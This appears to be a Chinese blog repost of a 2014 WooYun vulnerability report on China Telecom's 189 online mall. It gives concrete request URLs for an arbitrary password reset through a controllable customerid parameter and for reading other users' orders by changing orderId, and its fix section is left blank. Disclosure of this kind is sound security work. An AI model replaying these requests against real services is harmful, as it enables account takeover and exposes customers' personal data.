记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

中国电信189商城订单信息泄露漏洞与任意密码重置

2014-12-03 00:15

http://js.189.cn/emall/ 中国电信翼猫商城

重置密码的链接为

http://js.189.cn/emall/emall/member/setNewPassWord.html?customerid=()

customerid参数可控,如找回账户“123456”

q1.jpg



点发送邮件后直接构造链接

“http://js.189.cn/emall/emall/member/setNewPassWord.html?customerid=4028f4cb46019dab0146133b86d90029”

q2.jpg

q3.jpg



123456:123456 登录

q5.jpg



漏洞证明:

订单信息遍历

“http://js.189.cn/emall/userManage/getOrderInfo.do?0.2802860678639263&orderId=40519030262”

看一下我修改的帐号只有一个订单,但通过修改orderId可获取他人订单详情

orderId为订单号,只要订单存在便可获取成功

q6.jpg

q7.jpg



修复方案:

知识来源: www.wooyun.org/bugs/wooyun-2014-079849

阅读:106281 | 评论:0 | 标签:漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“中国电信189商城订单信息泄露漏洞与任意密码重置”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

学习黑客技术,传播黑客文化

推广

工具

标签云

本页关键词